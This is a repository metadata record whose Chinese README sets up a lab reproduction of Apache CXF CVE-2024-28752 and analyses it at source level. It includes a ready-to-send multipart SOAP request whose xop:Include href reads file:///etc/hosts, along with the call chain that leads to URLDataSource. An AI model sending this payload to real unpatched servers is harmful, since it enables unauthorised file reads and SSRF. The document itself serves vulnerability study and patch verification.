{"id":28373884,"url":"https://github.com/reajason/cve-2024-28752","last_synced_at":"2025-06-25T18:31:08.713Z","repository":{"id":292487800,"uuid":"981056220","full_name":"ReaJason/CVE-2024-28752","owner":"ReaJason","description":"Apache CXF SSRF CVE-2024-28752","archived":false,"fork":false,"pushed_at":"2025-05-10T12:09:12.000Z","size":148,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-29T20:50:33.890Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ReaJason.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-10T08:36:41.000Z","updated_at":"2025-05-10T12:09:15.000Z","dependencies_parsed_at":"2025-05-10T09:31:24.366Z","dependency_job_id":"761b8043-cdee-4889-b96e-ea9f63baae31","html_url":"https://github.com/ReaJason/CVE-2024-28752","commit_stats":null,"previous_names":["reajason/cve-2024-28752"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ReaJason/CVE-2024-28752","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ReaJason","download_url":"https://codeload.github.com/ReaJason/CVE-2024-28752/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261930464,"owners_count":23231886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-29T20:37:47.527Z","updated_at":"2025-06-25T18:31:08.700Z","avatar_url":"https://github.com/ReaJason.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Apache CXF CVE-2024-28752 复现环境\n\n\u003e 漏洞公告:https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt\n\n### 环境启动\n\n\u003e [samples/java_first_jaxws_factory_bean](https://github.com/apache/cxf/tree/main/distribution/src/main/release/samples/java_first_jaxws_factory_bean)\n\n#### IDEA\n\n通过 [ServerStarter.java](./src/main/java/ServerStarter.java) 启动 webservice 服务\n\n#### 构建\n\n\u003e 使用 JDK8\n\n```bash\nmvn clean package\n\njava -jar target/cxf.jar\n```\n\n### 漏洞利用\n\n使用 BurpSuite 发送如下请求即可触发。\n\n```http request\nPOST /test HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Type: multipart/related; boundary=----kkkkkk123123213\nContent-Length: 472\nConnection: close\n\n------kkkkkk123123213\nContent-Disposition: form-data; name=\"1\"\n\n\u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"http://service.namespace/\"\u003e\n \u003csoapenv:Header/\u003e\n \u003csoapenv:Body\u003e\n \u003cweb:test\u003e\n \u003carg0\u003e\n\u003ccount\u003e\u003cxop:Include xmlns:xop=\"http://www.w3.org/2004/08/xop/include\" href=\"file:///etc/hosts\"\u003e\u003c/xop:Include\u003e\u003c/count\u003e\n\u003c/arg0\u003e\n \u003c/web:test\u003e\n \u003c/soapenv:Body\u003e\n\u003c/soapenv:Envelope\u003e\n------kkkkkk123123213--\n\n```\n\n![burp.png](./asserts/burp.png)\n\n### 漏洞分析\n\n以下是文件读取的堆栈,xop:Include 标签是由 MTOMDecorator 这个类来解析的。\n\n```text\n\u003cinit\u003e:93, FileInputStream (java.io)\nconnect:90, FileURLConnection (sun.net.www.protocol.file)\ngetInputStream:188, FileURLConnection (sun.net.www.protocol.file)\nopenStream:1092, URL (java.net)\ngetInputStream:107, URLDataSource (javax.activation)\nget:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nlength:212, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\n_parseInt:94, DatatypeConverterImpl (com.sun.xml.internal.bind)\nparse:725, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)\nparse:723, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)\ntext:54, TextLoader (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\ntext:572, UnmarshallingContext (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nstartElement:92, MTOMDecorator (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nhandleStartElement:231, StAXStreamConnector (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nbridge:165, StAXStreamConnector (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nunmarshal0:400, UnmarshallerImpl (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nunmarshal:379, UnmarshallerImpl (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\ndoUnmarshal:887, JAXBEncoderDecoder (org.apache.cxf.jaxb)\naccess$200:103, JAXBEncoderDecoder (org.apache.cxf.jaxb)\nrun:926, JAXBEncoderDecoder$3 (org.apache.cxf.jaxb)\ndoPrivileged:-1, AccessController (java.security)\nunmarshall:924, JAXBEncoderDecoder (org.apache.cxf.jaxb)\nunmarshall:744, JAXBEncoderDecoder (org.apache.cxf.jaxb)\nread:172, DataReaderImpl (org.apache.cxf.jaxb.io)\nhandleMessage:109, DocLiteralInInterceptor (org.apache.cxf.wsdl.interceptors)\ndoIntercept:308, PhaseInterceptorChain (org.apache.cxf.phase)\nonMessage:121, ChainInitiationObserver (org.apache.cxf.transport)\n```\n\nhref 内容是由 AttachmentUnmarshaller 这个类进行处理。\n\n```java\nclass MTOMDecorator implements XmlVisitor {\n public void startElement(TagName tagName) throws SAXException {\n if (tagName.local.equals(\"Include\") \u0026\u0026 tagName.uri.equals(\"http://www.w3.org/2004/08/xop/include\")) {\n String href = tagName.atts.getValue(\"href\");\n DataHandler attachment = this.au.getAttachmentAsDataHandler(href);\n if (attachment == null) {\n this.parent.getEventHandler().handleEvent((ValidationEvent) null);\n }\n\n this.base64data.set(attachment);\n this.next.text(this.base64data);\n this.inXopInclude = true;\n this.followXop = true;\n } else {\n this.next.startElement(tagName);\n }\n }\n}\n```\n\nAttachmentUnmarshaller 默认实现类为 `com.sun.xml.internal.ws.message.AttachmentUnmarshallerImpl`,其只处理当前\nattachments 中有的内容。\n\n```java\npublic final class AttachmentUnmarshallerImpl extends AttachmentUnmarshaller {\n\n public DataHandler getAttachmentAsDataHandler(String cid) {\n Attachment a = this.attachments.get(this.stripScheme(cid));\n if (a == null) {\n throw new WebServiceException(EncodingMessages.NO_SUCH_CONTENT_ID(cid));\n } else {\n return a.asDataHandler();\n }\n }\n\n private String stripScheme(String cid) {\n if (cid.startsWith(\"cid:\")) {\n cid = cid.substring(4);\n }\n\n return cid;\n }\n}\n```\n\n而在 Apache CXF 中,实现类为 `org.apache.cxf.jaxb.attachment.JAXBAttachmentUnmarshaller`,扩展了这部分的实现。\n\n`file:///` 或是 `http://xxx` 这种常见 SSRF payload 将会初始化一个 URLDataSource。官方的修复方案也是在此处\n[apache/cxf@659a8](https://github.com/apache/cxf/commit/659a8f9b10bc8037774c0399e61e77e3955fd230)\n\n```java\npublic final class AttachmentUtil {\n public static DataSource getAttachmentDataSource(String contentId, Collection\u003cAttachment\u003e atts) {\n if (contentId.startsWith(\"cid:\")) {\n try {\n contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());\n } catch (UnsupportedEncodingException var3) {\n contentId = contentId.substring(4);\n }\n return loadDataSource(contentId, atts);\n } else if (contentId.indexOf(\"://\") == -1) {\n return loadDataSource(contentId, atts);\n } else {\n try {\n return new URLDataSource(new URL(contentId));\n } catch (MalformedURLException e) {\n throw new Fault(e);\n }\n }\n }\n}\n\npublic class URLDataSource implements DataSource {\n public InputStream getInputStream() throws IOException {\n return this.url.openStream();\n }\n}\n```\n\n最后 Base64Data 会调用 getInputStream 触发 url.openStream() 来读取数据并使用 Base64 格式编码传输。\n\n```java\npublic final class Base64Data extends Pcdata {\n public byte[] get() {\n if (this.data == null) {\n try {\n ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);\n InputStream is = this.dataHandler.getDataSource().getInputStream();\n baos.readFrom(is);\n is.close();\n this.data = baos.getBuffer();\n this.dataLen = baos.size();\n } catch (IOException var3) {\n this.dataLen = 0;\n }\n }\n\n return this.data;\n }\n\n public void writeTo(char[] buf, int start) {\n this.get();\n DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen, buf, start);\n }\n\n public void writeTo(UTF8XmlOutput output) throws IOException {\n this.get();\n output.text(this.data, this.dataLen);\n }\n\n public void writeTo(XMLStreamWriter output) throws IOException, XMLStreamException {\n this.get();\n DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen, output);\n }\n}\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Freajason%2Fcve-2024-28752","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Freajason%2Fcve-2024-28752","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Freajason%2Fcve-2024-28752/lists"}